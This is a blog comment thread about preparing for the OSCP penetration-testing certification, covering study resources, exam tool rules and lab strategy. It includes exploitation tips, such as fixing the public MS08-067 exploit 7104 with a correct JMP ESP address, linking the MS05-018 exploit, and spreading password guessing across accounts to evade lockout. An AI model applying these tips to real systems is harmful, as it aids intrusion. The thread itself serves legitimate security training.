      The exam instructions you receive will list any restrictions. That being said, I don’t recall there being a restriction for my exam.

  30. Diego says:

    Hi Mike,

    thanks for your great post !!

    I have a doubt I hope you can help me. I am thinking about facing this cert. English is not my mother language. I can read English without problem and, usually, I can understand spoken English (it depends a lot on the accent). However, I am a little scared I can not understand the videos (So far, I’ve been able to follow the one in the Offensive-Security web site). Are the videos really important? I mean, can I learn all the stuff needed just by the pdf guide?

    Thanks a lot.

    • Mike Czumak says:

      Thanks Diego. I must admit I can’t entirely relate to your issue for this course since English is my first language but I hope my response helps. The video posted to the Offsec site is exactly like the videos in the course so if you understand the spoken accent, you should have no problem. A lot of the benefit you will get from the videos is from watching the demos so even if you don’t understand every spoken word I think you’ll still find them useful. I would consider the videos a good supplement to the pdf guide as they sometimes go into more detail and reinforce the written examples. Also keep in mind much of what you get out of the course will also come from your own research outside of the pdfs and videos. – Mike

  31. en says:

    Hi Mike,

    I was wondering if you could share same information that you shared with gd?
    I’m trying to make 7104 exploit work and having problems
    It compiles fine but gives errors when executing it.

    Thanks in advance

    • Mike Czumak says:

      Unfortunately I experienced the same thing — compiled, but errors when executing. I didn’t use that exploit and haven’t yet taken the time to see why it’s failing. Sorry I couldn’t be more help. -Mike

  32. yassine says:

    hey Mike,
    i am preparing the oscp lab, i got 21 host until know. I want ask you if you couldgive me a small hint (without spoiling too much) about this too host in the IT DEPT and searched for a direct exploit using the info about the service from nmap enumerating, but non result, i want to dirbuster the 2 webserver un the hosts but it’s almost inpossible because pivotiong made the thing too slow.
    So if you could give some help, i will realy apriciat that.


  33. Krautcomputer says:

    Big thanks for this writeup. Especially the insight into how you organised and consolidated the information helped me to get started. I find it quite challenging to keep a clear view of all the vast amounts of info I gather about the targets. I tried a few tools like magictree and armitage. But so far only keepnote met my requirements when it comes to structuring the info (i.e. grouping hosts) at least half.

    What do you use these days to keep host info organised?

    • Mike Czumak says:

      Thanks. Regarding what I use for organization, I’ve developed standard document templates to record my test results and all gathered system info which then translates directly to my standard report template. I tend to work within those documents most of the time (which really helps me to standardize my approach) but I will still use keepnote or even notepad++ as “scratch” paper as I go. I would share the templates but since I developed them for my organization they’re technically not my IP to distribute. – Mike

  34. Ashish says:

    Hey Mike,

    Can you share the notes that you had prepared using keepnote. It would be great..


    • Mike Czumak says:


      The only keepnote notes I’ve maintained are those pertaining to how I rooted each of the machines and those I cannot share.

      – Mike

  35. Melvin Fernandez says:

    Hi Mike,

    Thanks a lot of this great post.I have searching for quite some time on whether to go ahead for this course.Thanks to you will go ahead this month and register for it.I wanted to go for the CEH exam but as most people say its all theory.Will this examination be too tough for a beginner ?

    • Mike Czumak says:

      Thanks Melvin. When I took the OSCP course and exam I did already have quite a bit of experience, but I believe that if you’re willing to put in the time to study and get all that you can out of the course, you’ll have success on the exam. Regardless of whether you pass the exam the first time or not, you will get real value out of the course if you invest the effort. Best of luck.

      – Mike

      • Melvin Fernandez says:

        Hi Mike, Thanks for your reply.Could you suggest me any other books / material that could help me in this exam .In the examination do they ask everything from the course they provide? — Melvin

        • Mike Czumak says:

          Melvin, check out my comment from 25 Feb of this year in response to Chris’s question. I do mention some specific recommended resources by topic. Let me know if that helps.

  36. Purushottam Bhandari says:

    Hi Mike/Everyone,

    First, i would like to say a Big thanks to Mike and all other contributors. I am reading your blogs from last few days and it helped me a lot to clear many of my doubts. As i am beginner and planning to enroll for PWK, just want to have your suggestion about the rode map to OSCP(i have done CCNA). As i have done CCNA, jumping in to PWK is correct or not.?
    FYI- i am reading things online, if i can have some of study material from you for preparation, that can be a real help and then i can be more prepared and confident, in 1-2 month i will join the PWK Course. As i just want to utilize my Money and time wisely:-),,,, PLEASE SUGGEST.

    Highly appreciate you for your suggestions and help for study material….:-)

    • Mike Czumak says:

      Thanks for the feedback. As far as a road map to the OSCP and preparation for the PWK course, that really depends on your current level of knowledge/experience. I think that the Offsec recommendations are sound — you should have a solid understanding of TCP/IP/networking (which you should have from your CCNA) and familiarity with Linux and Windows OS. Scripting knowledge (bash/python/perl/etc) certainly helps too. Aside from that, take a look at the course syllabus and see if there are things that are completely foreign to you. If so, there are many online and print resources that can help you. Refer to some of my prior comments on this post for specific recommendations. While the OSCP cert is great, I think the real value here is in the quality of the course and the lab. Master the material and the cert will follow. You will get a lot out of it (regardless of your current skill level) as long as you are willing and able to invest the time. Let me know if there are any other questions I might be able to answer for you. Best of luck – Mike

  37. Purushottam Bhandari says:

    Thanks a lot for your helping hand on it.:-)

  38. Ban says:

    Thanks for your time and efforts you spent to provide such great review. In fact, this is the best review I found so far for this course!

  39. Kylie says:

    Thanks Mike for these scripts, they look great. I’ve changed the hard coding to match my directory structure, but I’m getting a whole heap of Traceback errors. Do you know what could be causing them?

  40. Kylie says:

    Have another quick question Mike, how long is the script supposed to take to run, because mine never seems to end?

    • Mike Czumak says:

      Thanks for the feedback Kylie. To address both of your questions…if I recall correctly, the last step of the script is the password attack which can run for quite a long time (the reason I made it last). At this point I usually let it run while I review the results from all of the other scripts and formulate the plan of attack. You’ll probably get to the point where you can manually stop the password attack portion of the script. Regarding the traceback errors, I’d have to see them to better understand. I’ve sent you an email so we can communicate directly. -Mike

  41. Miki says:

    Hey Guys,

    would you be kind enough to send me a PWK pentest with kali PDF book.
    And if possible its video files as well .

    Many thanks

  42. Phreak says:

    Hi Mike,

    As you told 7104 exploit is compiled with VS 2008 but still after successful compilation there is error, so my question is 7104 exploit is not be useful in PWK labs ? or there is some other available exploit for ms08_067_netapi for Window XP ? and which other exploits should i focus on more ?

    Thanks in advance

    • Mike Czumak says:

      I don’t have a vulnerable version of XP handy at the moment to see why it’s failing but if you’re really curious and you have an unpatched OS, you may want to attach a debugger and see if the offsets are correct or if 0x7ffa4512 is even a valid JMP for Win XP EN. If it isn’t but everything else aligns it may be a simple matter of changing the JMP address. If you don’t have the time to investigate I wouldn’t get too hung up on that one vuln. If you need to fallback on Metasploit every once in a while it’s not the end of the world. Btw, Metasploit may also be a means to analyze the exploit and write your own.

    • Mike Czumak says:

      Ok, so I finally took the time to look and confirmed that the published version of Exploit 7104 is not working in Win XP EN because the JMP ESP address used was for a different version. Pick a correct JMP ESP and you should have no problem getting it to work (I’ll leave that exercise up to you). I got it working consistently with Windows XP SP3 EN. – Mike

      • Mark says:

        using this exploit did you ever encountered a problem during the connection to the target host?

        I got this error:
        “connect ipc$ …. fixme:mpr:WNetAddConnection2A (0x60fdd4, 0x404122, “”, 0x00000000): stub”


        • Mike Czumak says:

          I seem to recall that error when you try to run the exploit from a Kali machine via Wine. Is that what’s happening here? I’ve run it successfully from a Windows XP machine with no errors.

          • Mark says:

            good call! the error is triggered when the exploit is run via Wine.

            However I tried to run the exploit via the Windows machine provided in the labs: even if the error is not triggered anymore, it says that it can’t connect to the target machine…(yes, I’m sure that it is vulnerable because I’ve exploited it with metasploit)

          • Mike Czumak says:

            In my experience, this exploit will crash the SMB services on the target machine so it could be that a reboot is required to get it up and running again. You might try it once but I wouldn’t waste too many reboots on it.

  43. Vojkan says:

    I am still struggling with the LAB machines. In your experience, what is the percentage of LAB systems which should be exploited through web application vulnerability?

    Also, thank you for your post.

    • Mike Czumak says:

      For me I think it was between 30-40%, though that was before they upgraded the lab so it may be completely different.

  44. kranthi says:

    Hello Mike ,

    Your review really helped me in tackling OSCP labs with more ease & comfort. I am really greatly for such a nice writeup. Currently i am doing OSCP and its going great I am able to get most of the machines in public network and also able to unlock 2 networks, but yet to try pivoting stuff.

    Mike i need some help form you I am trying to compile MS05-018 exploit but getting error on “try” function I tried googling it but could not find an solution for it can u help me compile this exploit please or point to a writeup which explain about the error.

    • Mike Czumak says:

      Glad you found the post useful. I’ll try to help with your compile issue. I need to know a couple of things:
      1) Which exploit for MS05-018 are you trying to compile? Is it this one? :
      2) What is the exact error you are receiving?

      I was just able to successfully compile exploit 1198 on a Windows XP SP3 machine using Visual Studio (C:\…VC\bin>cl 1198.c) . I initially received two errors like this: “error LNK2019: unresolved external symbol __imp__SendMessageW@16 referenced in function _exploit”. This indicates you are referencing a function in a library you haven’t linked to. I simply had to add the following to get it to compile successfully: #pragma comment (lib, “User32.lib”).

      Let me know if this solves the issue or if you have other questions.

      – Mike

  45. kranthi says:

    Hello Mike ,

    I am sorry for late response I was occupied with gh0st & Pain machines in the lab. I will follow your suggestions and work my way through. Once again i am glad that you took time to help me out.

  46. kranthi says:

    By the way i was trying to use this ” ” exploit only …. 🙂

  47. C. says:

    Hi Mike, great review. Just wondering which tool you found best for compiling windows exploits for priv esc.


  48. Kranthi says:

    Hi Mike ,

    Whats the best environment to compile most of the exploits you mentioned. Should i setup any VM (like winxp or win 7 ) install turbo c so i can compile them and use as and when required. What do you suggest


    • Mike Czumak says:

      Sometimes I used wine/gcc on my Kali box but most of the time I used Visual Studio command line (cl.exe) on one of my Windows machines to compile the exploits because that’s what I’m used to.

  49. David says:

    Hey Mike, when the offsec team provides the access to the labs, now a days, the give you a virtual machine with Windows 7 and some software, but would you consider (as complement in past comments) to get my own virtual machine with windows OS in order to compile my exploits in visual studio? I can’t remember if the virtual machine provided by offsec team contains visual studio.

    Thank you in advance.

    Best regars.

    • Mike Czumak says:


      Since I already had a Windows VM w/ Visual Studio that’s what I used to compile and test my exploits (purely out of convenience). If they do provide a compiler on their VM you may find it unnecessary to get your own, especially if it means incurring an expense.

      – Mike

  50. JK says:

    Hi Mike, great writeup! I just transitioned over from other IT disciplines into security about a year ago and hold the SANS GSEC, GCIA and GCFA certs, but no scripting experience.

    Without scripting knowledge, would you advise against tackling this cert? I really want it, but afraid it would be a wasted attempt if scripting is required to pass.

    • Mike Czumak says:

      Thanks JK. That’s a tough one only because I frequently rely on scripting…not just in the course but professionally as well…it’s hard for me to imagine not using it. Personally, I wouldn’t recommend taking a course like this with absolutely no scripting experience. That being said, you don’t have to be an expert and, depending on your available free time, you may be able to get enough familiarity with scripting in a matter of weeks. I would recommend becoming familiar with bash and another language such as perl or python. Don’t go overboard…if you understand the basics you can build upon it as you go. There are so many free online resources to choose from. Here are a few examples:

      Online training:

      For bash, try watching the first video above and practicing the examples. Take notes of frequently-used commands so you have them to reference as you’re taking the PWK course. For python, try something like code academy to get some hands-on practice of the basics. You can always build upon this as you’re taking the Offsec course but at least you won’t be starting from scratch.

  51. Mew says:

    hey mike im doing the pwk course im 1 week into it , I was wondering if you were allow to use armitage in the labs or exams or is that prohibited ?

    • Mike Czumak says:

      I didn’t use it but I imagine the rules for Armitage are the same for Metasploit. I could use it in the labs, though I usually didn’t for exploits since there are limitations for use on the exam (and you might as well practice like you’re going to play!)

  52. Manz says:

    Hi Mike,

    Really inspired by your post! I’m considering taking this course next month (after my holiday) and this is a great heads-up. Would be great to talk to you (hence, sending you a linkedin request).. Also, wanted to find out more about if you still use the skills learnt in your current position?
    Also, if anyone would like to buddy up for this course, please let me know.. I’m looking at Nov 14

    • Mike Czumak says:

      Thanks. I just accepted your invite. My job is performing pen-tests on a near-daily basis so I definitely use these skills. I’ve been doing this for some years now, but I’m always looking for ways to hone my skills, expand my knowledge, and challenge myself. This course definitely did all three. – Mike

  53. Atul says:

    Thanks Mike for such a wonderful post and scripts !!
    I am fairly new in Infosec world ,Though I have been working as Security Analyst for past 6 months and have dreamt every moment of it to have my OSCP but many have suggested me that I should get atleast year or two experience in the field to give my 100% in the exam. I need your suggestion. Should I go for it now or should get some experience just to decrease my failing risk ?

    • Mike Czumak says:


      Thanks for the comment. I’m never one to dissuade someone from going after a goal so it’d be difficult for me to tell you not to attempt the course. However, there are some of those key skills that you want to ensure you have — namely a familiarity with a Linux and Windows OS environment, some basic scripting skills, and a fundamental knowledge of networking concepts (familiarity with and use of various protocols, difference between UDP & TCP, etc). These basics are the things you don’t want to be struggling with in the course. I’ve posted several resources (both in my post and in the comments) that might help you. You might also consider familiarizing yourself with Kali and the various tools. It may be wise to review the PWK course syllabus and self-assess how familiar you are with some of the concepts. It wouldn’t hurt to do some preparatory reading/research on some of the topics before you attempt the course if you haven’t been involved with security for a while. This may take you a few weeks or a few months, but I would suggest you get the basics down first. That said, I wouldn’t be pressured into waiting a set amount of time. Getting another year or two of experience would be helpful only if that experience could be directly applied to the course. If you feel you’ve mastered the basics after a month or two then you might go for it. Just remember that there’s also no rush to get the cert — the true value of the OSCP is not in the certification but in the completion of the course. Getting the cert is great, but it feels a lot better if at the end you know you’ve learned as much as possible. Offsec gives you all of the basic tools and concepts and it’s up to you to build on them throughout the course. If you have the time and are willing to put in the work, you may not have to wait too long to take the PWK…as long as you’ve learned the basics first.

      Hope this helps.

      – Mike

      • Mew says:

        Hi Mike im 3 weeks into the pwk course and theirs been some confusions on what is allow in the exam it self? is msfconsole allow in the exam? if not what is allow in the exam how do to do the penetration and exploit with out msfconsole? i understand some mass scanners is not allow please if you can , can you explain to me what are the restrictions and what we can use? the information in the exam was not very clear

        • Mike Czumak says:

          First, keep in mind that when you take the exam you will receive a written guide that clearly outlines exactly what you can and cannot use and Offsec may change their exam guidelines. With my exam, there were limitations on the use of Metasploit. Keep in mind that Metasploit is much more than just exploits and msfconsole (or msfcli) can be useful for scanning/enumeration and more. In general, I believe that auxiliary scanning with Metasploits is permitted on the exam, though once again that could change so I recommend exploring other methods. I used very little Metasploit during my PWB course. When you believe you’ve found a vulnerability, search for exploit scripts on Exploit-db or other sites and see if you can modify them to suit your needs. It might take some additional effort, but you will learn much more and better prepare yourself for the exam. Regarding vulnerability scanners (Nessus, etc), I recommend not using them during the course. You probably won’t be able to use them on the exam and again, the point of the course is to teach you the various methods of enumeration beyond a point-and-click scanner. Metasploit and nmap can be useful tools for enumeration, however if you write your own scripts you will probably learn a lot more. – Mike

  54. Rob says:

    Any tips for compilation? – I can compile this using the tips above on Windows XP. However I only have the Express Version of Visual Studio 2010 which will not build Windows 2000 exes. So it makes an exe, but if you try your exploit on Win 2000 you get “not a valid Win32 application”. Is there any way round this?

  55. Rob says:

    Yes – I originally tried gcc on Linux, but the __try __except statements are only supported on Microsoft compilers.

  56. Rob says:

    Just tried with Visual Studio Ultimate 2010.

    Same issue – compiles fine, but won’t actually run on a Win 2000 platform. Just checking if you tried it on Win 2000 or just XP? Thanks.

    • Mike Czumak says:

      I haven’t had a chance to try it, but it’s very possible I did not attempt to execute that exploit on a Windows 2000 box. Sorry.

  57. miguelangelo says:

    Hey! Thanks a lot for sharing your enumeration scripts! I have just passed the OSCP exam and your enumeration methodology played a big role. I didn’t used the scripts ‘as is’, but I analysed what your scripts do and used the commands and methodology in them to manually perform my enumeration. So again… thanks !! 🙂

    • Mike Czumak says:

      That’s great! I was reluctant to post those particular scripts because they were hastily coded, single-purpose, and never meant for portability or reuse, but you did exactly as I had hoped and used them merely as a guide to how you might go about enumeration. Awesome job on passing the exam and earning the cert. Best of luck, Mike.

  58. AK says:

    Hi, Mike.

    I have read about 10 OSCP reviews, and yours is the best so far, by far. I thank you for your details and posting your enumeration scripts. I will be sure to model mine after them.

    I just finished with the PWK course manual and videos today, so I’ll begin my actual pen-test of the THINK.local domain in the next day or two. Before I do, I would very much like your advice to better hone my strategy.

    1. I noticed in some screenshots above that you ran DNS enumeration, WHOIS and Google d0xing on some of the targets. I was wondering why the bother. Is not this information only useful if the attacker is unaware of which IPs to test and for social engineering attacks? In our case, we already know which IPs to target, and there is no human to social engineer. Did these information gathering techniques prove of any use to you?

    2. Along the same lines as the first question, I do not suppose we need to worry about launching any client-side attacks or any type of attacks that relies on human interaction (e.g., XSS), right?

    3. Per your advice, I decided to forego the use of Metasploit, vulnerability scanners, etc. However, every machine on the target subnet is vulnerable in some way, right? So, did you find any machine that did not run a service with a publicly known vulnerability? Even if the vulnerability is not published on SecurityFocus or Exploit-DB, it must be discoverable somewhere, right? They would not host a target with a vulnerability so esoteric that it would be next to impossible to find, would they?

    That is all I have for now. Thanks much again for your review and your feedback.

    • Mike Czumak says:

      Thanks for the feedback AK, I’m glad you found the post useful. Regarding your questions:

      1) Those were simply notes from the course. There was no reason to perform any external WHOIS/Google searching on these internal test networks. DNS enum on the other hand is helpful as you will probably see when you begin your enumeration on the internal lab network(s).
      2) Not necessarily. Offsec is pretty clever in its use of possible exploits. I would not rule anything out — even attacks that would typically require user interaction.
      3) Yes, every machine is vulnerable in some way — discovery and exploitation will be a combination of enumeration, Google searching, and critical thinking.

      – Mike

  59. AK says:

    Thanks so much for your responses to my previous questions, Mike.

    I am currently working my way through porting your enumeration scripts to my own, and I had some additional questions about your tactics.

    1. I noticed that, after your main Nmap scan, you only follow up with enumeration of services discovered on TCP ports. Why not UDP ports as well?

    2. I see you also exported your main Nmap scan into an XML file (-oX). Did you find this of any use? I examined a few XML exports in both Notepad++ and MS Excel, and I do not really see any additional value in this over the general (-oN) exports. How exactly did these provide extra help to you?

    3. I read some posts above with questions about password brute-force attacks, and I was a bit concerned with one of the course exercises that asks you to launch an online password attack without locking out any user accounts. Now, these two goals seem contradictory to me. If a machine has an account lockout policy, it cannot be brute-forced (within any reasonable time limits), right? Did you do any online password attacks when you did the course?

    • Mike Czumak says:

      Regarding your questions:
      1) I did UDP enumeration as well. I may not have left it in the posted script but you can easily add it. Just note that by its nature, UDP scanning can take considerable longer so you may want to be conservative in your port ranges.

      2) I used the xml file for Zenmap (which I sometimes use for large networks). If you want a graphical display of your scan output you may give it a try.

      3) You always have to be aware of potential brute-force protections when performing a password attack. Depending on the application, you may have to consider timing, # of attempts (per account and/or per IP), or both. If you were testing an Enterprise application like OWA and had thousands of accounts at your disposal, you might try a password guessing attack from multiple IPs, attempting only 2-3 of the most common passwords for each, with some additional timing factors. I didn’t encounter anything of this scale in the course, though I do recall at least one dictionary-based password attack on a much smaller scale.

  60. Tov says:

    Hello Mike, Please I need your advice on how to pass this exam, I want to discuss some aspect of the exam. I met some challenges and I couldn’t go any further I after I had grabbed about 55points. I want to retake the exam but I have some machine I need advice on. Please write me

  61. bman says:

    Hi Mike,

    Are we allowed to use the nse nmap scripts during the exam

    • Mike Czumak says:

      Typically enumeration scripts are allowed, and I don’t recall any specific limitations on nmap scripts. There are limitations on automated vulnerability scanning (such as Nessus). I would caution that things may have changed since I took the exam, but the instructions will clearly spell it out for you.

  62. Sachin says:

    Great Post!

    Thanks for sharing such useful information.

  63. AK says:

    Hello again, Mike.

    I have since exploited about 10 machines in the lab, and I have to thank you again, for your *nix privilege escalation script really made things simpler for me on some of these machines. In fact, I want to update it myself by adding to the sploits dictionary. I was wondering how did you go about building the dictionary. I first thought there was a search index on that could be used to limit the min and max kernel versions, like you do with the dictionary, but there isn’t. It looks like you built the dictionary manually by adding exploits you find here and there, but that seems like a lot of research effort. Can you please shed some light on how you built it?

    I was also wondering if you could possibly e-mail me the IP addresses for pain, humble and fc4. I ask because the admins recommend you finish with these machines and sufference before attempting the exam. Only sufference advertises its host name. As my lab time dwindles down, I don’t want to spend possibly several days just to get a limited shell on these boxes just to find out I may have to spend several more to get root/system. I want to avoid them until I finish with all other machines to better utilize my time.

    Thank you.

    • Mike Czumak says:

      Thanks AK. I’m glad you found that script useful and I certainly encourage you to update it in any way you see fit. I did in fact build the dictionary manually but Google can be a great tool to speed up the process. You might start with a simple “ linux kernel” and use the custom date range or add some additional modifiers to narrow down results. Regarding the IP addresses for those boxes, the network ranges allocated to students differ. There may be consistency in the last two octets but I’m sure that’s also subject to change. As such, I’d rather not post that info since it may be misleading to future students. You might have some luck finding at least some of those IP/hostname pairings via a Google search but since enumeration is such an important part of the course, I would encourage you to locate them on your own. You could turn to the admins for help but I imagine they might tell you the same.

  64. Mew says:

    hi mike any additional materials books etc pdf i can train and learn from for b0f ? im newbie at this

  65. Dave says:

    One of the target host in the first net of the lab is hosting a website that is a login screen of the offensive security team, I tested a spidering, sql injection, XSS, but the interesting thing is that I could see some interesting stuff.
    When spidering, some URLs showed some funny images, as well I could find some script kinda weird.
    I hope that you could remember if you could see this website, this host is always the IP X.X.X.1, what do you think?
    Did you pwned this host?
    Please let me know.
    Kindest regards.

  66. AK-33 says:

    Mike, would you mind terribly sending me an e-mail so we can communicate in private?

    I am making a more earnest effort to learn how to really capitalize on the information returned by your priv esc script instead of just relying on the list of potential exploits at the end (because I’m not really learning anything that way, so that’s kinda cheating). I would very much like your input on honing my focus and attack strategies.

    Thank you.

  67. Rakish says:

    Thanks a lot Mike for this nice review , my friend can you send me an email , i have an SQL question .

    Thanks Boss

  68. gerhardtgoll says:

    Hey Mike, excellent review!

    I have a question regarding the limited use of MSF on the exam. If my question my be too revealing please let me know, or just delete it. My comment might be rather lengthy so I apologize in advance if I’m rambling a bit.

    I am relatively new to pen testing but do have the Security+ cert, even tho I am not employed in anything near the field I’m trying to prepare myself for. Hence me taking the PWB course, more so just to learn, as they say it, the offensive side of security.

    Now regarding my question, my scripting skills and programming are at a very low level, tho I am currently going through the Python for pentesters on pentesteracademy and have gone through all the assembly language, buffer overflows on securitytube as well, its really only starting to all come together (I hope) but it’s obviously much more difficult when you essentially start from scratch to script or code whatever it is you’re trying to do, especially since I have a little over 3 weeks until my lab time is up. I have the Shellcoder’s Handbook and Rootkit Arsenal but really do not have the time to fully devote myself and finish the course, to what appears to be the most significant part about exploitation, not to mention the most fascinating.

    Basically, is msfvenom/msfpayload allowed to be able to write shellcode, etc. and use the handler exploit to go along with it?? I have exploited several machines in the lab through ExploitDB, Securityfocus, but its been very difficult for me, not to mention very troublesome when I have to drastically improve the code.

    Or perhaps you could answer this question instead: should I focus myself more in this direction, the coding aspect of it, since everything else is much easier for me to follow and implement? Or is coding/scripting, not unnecessary, but can be managed w/o to pass the exam, albeit it would assumably be much more laborious? I’m definitely devoting my time into fully into the debugging and the coding aspect after I finish the course, since from my view, that is what’s at the core of it all. Wish I’d a known this prior to signing up. Thanks again for such an excellent review as well as your follow up comments to all those who have had questions.

    • Mike Czumak says:

      Thanks for the feedback, I’m glad the review was helpful. Regarding your question about msfvenom/msfpayload, yes they were allowed to be used to generate the shellcode but I would not rely on using any exploit modules from Metasploit. It’s definitely wise to focus your remaining time on topics that you feel weaker in and you should be comfortable with modifying existing exploits (to include changing addresses and replacing shellcode) although the OSCP course (and exam) covers other topics so I wouldn’t get too wrapped up in any one area at the expense of others. I say this with the caveat that I took the course over a year ago, but in my case the exam was true to the course. If you’ve conquered a good number of boxes in the lab and feel comfortable with the skills needed to do so, you should have no problem with the exam.

  69. Lajos Nagy says:

    Hi Mike, Congratulation for your Certification! 🙂

    I have a “stupid” quistion about Windows Local Priv Esc exploits.
    I found some exploit which is open a new console window on the machine. so that’s exploit useless in a meterpreter shell.. This are useful if you have a GUI login in the victim computer. But in the lab the users aren’t member of the Remote Desktop Users localgroup. So, you cannot login interactively on that machines. (You don’t use this exploits …) How you tested this exploits? in meterpreter or interactively or you modified the exploits?

    • Mike Czumak says:

      Thanks Lajos. I would not assume that all user accounts do not have the ability to authenticate via RDP (in the lab and especially in “real world” scenarios). In such cases, if the user has a limited access account, GUI-based interactive privilege escalation exploits may be very useful.

  70. AK says:

    Hiya, Mike. Your responses to all questions above have been really helpful, so I got some more for you.

    1) A number of commenters have already indicated they had trouble compiling and running the MS08-067 exploit EDB-ID: 7104. You responded that you used Visual Studios for the compilation without error. I did the same thing successfully, but I have not been able to execute it against any of the Windows boxes vulnerable to it. That is because I am using Wine when I do, and I read on the forums that Wine does not load certain SMB libraries needed to run this exploit. Also, another student got it from an admin that certain exploits will *only* work with Metasploit. I was wondering if you were successful in using Wine to run this one. If not, can you please point out how you did it?

    2) On the exam, did your target boxes host all new vulnerable services to exploit or ones that needed new attack vectors not taught in the course, or were they just slight variations of the lab machines?

    3) In your regards to your advice two questions above about being comfortable with changing return addresses: in order to do this, you must be able to find the vulnerable application with the same version as the one running on the target, download and debug it. I have experienced two problems with this process. Firstly, some software apps are so out of date, they can no longer be found (not even on the Wayback machine). Secondly, the admins may have modified the software specifically running on the target, so even if you debug the app that’s publicly available to pinpoint the return address, that address may not work for the app on the target. Can you please share a few words of wisdom on if and how you dealt with these issue.

    As always, much gratitude for your time…

    • Mike Czumak says:

      1) I was able to compile via Wine but I executed it from a Windows box.
      2) Without divulging too much about the exam, I would say that it stays true to the concepts of the lab. If you can master the type of exploits found in the lab then you will be prepared for the exam.
      3) If you’re referencing vulnerable software found in the PWK labs, I didn’t experience any issues with finding the correct return addresses/offsets b/c I tested the exploits on the same OS versions.

  71. Chris says:


    Here’s to you and a great blog. I want to personally thank you for taking the time to put together such an informative and well written resource. You know this stuff, so I recognize that you sharing with us is truly a selfless gift.

    Would you mind emailing me? I need some advice related to this topic and an upcoming deadline, and frankly I’m lost.

    So keep up the good work, and I hope to hear from you!


  72. Hi Mike,
    You really did an awesome work by sharing your experiences about OSCP. I am trying to start a website that help peoples learn about Security and Pentesting. If possible mail me some of your important articles on OSCP so I will update it and all credit will be yours Sir.


    • Mike Czumak says:

      Thanks very much. At this time, I’m not contributing articles or content to any other sites but you’re more than welcome to link or reference if you’d like.

      – Mike

  73. JK says:

    Hi Mike,

    As many others have stated, thank you for this write-up.

    I work in the security field, but I mostly do policy with some Nessus scanning, etc. I’d say im an intermediate (at worst) at Bash (I can handle a Unix command line pretty decently), and a beginner-intermediate level at Python (i normally can at least decipher what’s going on in Python code). However, my experience with C/C++/JS/Ruby is really lacking (I know minimal JS syntax and stuff, but that’s about it). I do know PenTesting basics, and procedures etc (reading Hacking Exposed 7, have completed a number of labs on, etc).

    My question to you is, do you have any scripting resources that I should look into before I register for PWK? I don’t want to spend 1/2 of my lab time trying to figure out how to write scripts. Also, is there a section of the course that is geared toward teaching scripting? I think that’d help me a lot.

    Basically, I’d like to get a feel of what type of knowledge baseline I “SHOULD” have before I start PWK. I did see that you recommended a few SecurityTube vids, bash scripting and some of the megaprimers, but is there anything else you’d recommend I do before I immerse myself into this? I want to make sure I’m prepared for everything that I will be learning.

    Thanks so much! Hope to hear back from you! (Please email me if possible)


    • Mike Czumak says:


      There was a short module on basic Bash scripting when I took the course but based on what you’ve stated, it sounds like you have a grasp on the level of scripting that will be needed (intermediate Bash, beginner/intermediate Python). For me, the best way to learn a new scripting or coding language is to practice automating some real-world problems. My only formal training in coding came from my undergrad Computer Science curriculum where (believe it or not), I learned Ada. Since then, most of my web programming, c, ruby, python, and perl experience has come from self-study, writing exploits, developing Metasploit modules, and tackling on-the-job problems. If you want improve your proficiency in a particular language, you might consider coming up with a few tasks that you’d like to automate. For example, try writing a port scanner in python. If you get stuck, just Google “port scanner python” and you can find multiple resources on how to do it.

      That said, a course like PWK can also help you improve your scripting skills and I wouldn’t worry too much about mastering scripting before you take it. Understand the basics and you should be fine.

      – Mike

      • Johnny says:

        I’d also like to chime it JK.

        Recently completing the course and getting my cert, I have to say, it was not as difficult as it’s made out to be but nonetheless, fascinating since you basically have an entire network at your disposal. That is what makes the course. You’re essentially paying for real-world experience.

        In all honesty, the course videos and PDF is sub-par at best. I understand the “try harder” motto but I found free references which go above and beyond what they provide you, which they btw don’t reference at all. They provide you with very basic examples and leave it up to you to do the rest. I mean, the very basics. It’s quite annoying to be honest, but again, the course is in the labs. The more you learn how to exploit, the more you see the need to automate,as Mike has done with his priv escalation and scanning scripts. You really do learn the most out of it that way, especially when understanding exploit code.

        Saying all that, I refer you to Everything covered in that course applies to the Kali course, and much, much more. Not to mention, it’s free. Also, since you mentioned you did a few modules on, you should consider doing the Nebula, Fusion, etc. exercises as well. If you do these prior, you’ll be more than ready to tackle the labs in Offensive Security.

        • Mike Czumak says:

          Thanks for your input and the great resource.

          • JK says:

            Hi guys,

            One more question…and this is only tangentially related to the OCSP, so I apologize in advance.

            I’m going through the Metasploit Unleashed course on off-sec. However, near the beginning, while learning the fundamentals I’m trying to nmap my Metasploitable…and this is where I run into issues.

            Metasploit for some reason is unable to guess Linux/Unix as the correct OS (gives me QEMU), however in the course ( under the “Importing and Scanning” section) it definitely knows it’s Linux/Unix.

            Also, in the above link under “Creds”…my Metasploit is unable to use that exploit as it says there’s an “unsupported version of MySQL detected”.

            My question is, is anyone familiar with the problems I’m running into? I’d like to be able to make my Metasploit output match that of the walkthrough, but really I just want to make sure I’m not doing anything wrong.

        • JK says:

          Hey guys,

          Thanks for the replies. I’m definitely going to check out all those free resources before I get into PWK (I also have my last semester of grad school for Cybersecurity this spring, so that might be easier to do in tandem with school). Maybe by summer after I graduate and go through those resources I’ll be more than ready for this.

          Thanks so much guys!


  74. TL says:

    Hi Mike Czumak,

    Thanks for nice report.
    Can I have your email, I want to connect to you in private.

  75. gerhardtgoll says:

    Thanks again for your excellent review and follow up. I have a question regarding sufferance and humble. I have less than a week left in my lab time and would really like to get that “Aha!” moment with these two. If you don’t mind, can you send me an email regarding your approach to them and how you managed to succeed. It can be an overview, it doesn’t have to be in exact detail. I feel like I can get in Humble but something is missing (if not everything). I extended my lab time just to get in these systems, but sadly, school has caught up with me after the breaks and I can’t invest 10 hour days anymore as well as getting ready for the exam itself. If not, I will definitely understand, but I think chipping up the 1250$ should at least be enough to satisfy my lust 😉

  76. Astha says:

    Hi Mike,

    Excellent page. I will say it is best one i found till date.
    I have one question. During exam will we be asked to whip a complete new script for a vulnurability? or change a DOS script to a exploit script? since that would require debugger assistance.
    Also, Can you please mail me since i have some questions on the labs.

  77. ctg says:

    Hey Mike,

    Thanks for the great info.

    So to sum it up, if you can basically go through the whole training material that the course provides and understand everything that is mentioned, one would be fine to pass the exam?

    My background is in networking, not coding..

    My approach for study was going to be..

    – Watch the Securitytube videos that you mentioned above.
    – Watch the Securitytube python videos.
    – Watch the Securitytube assembly and shellcode videos.
    – Read through the offensive security PWK syllabus PDF and try to understand everything mentioned.

    Should that cover it?

    Thanks Mike.

    • Mike Czumak says:

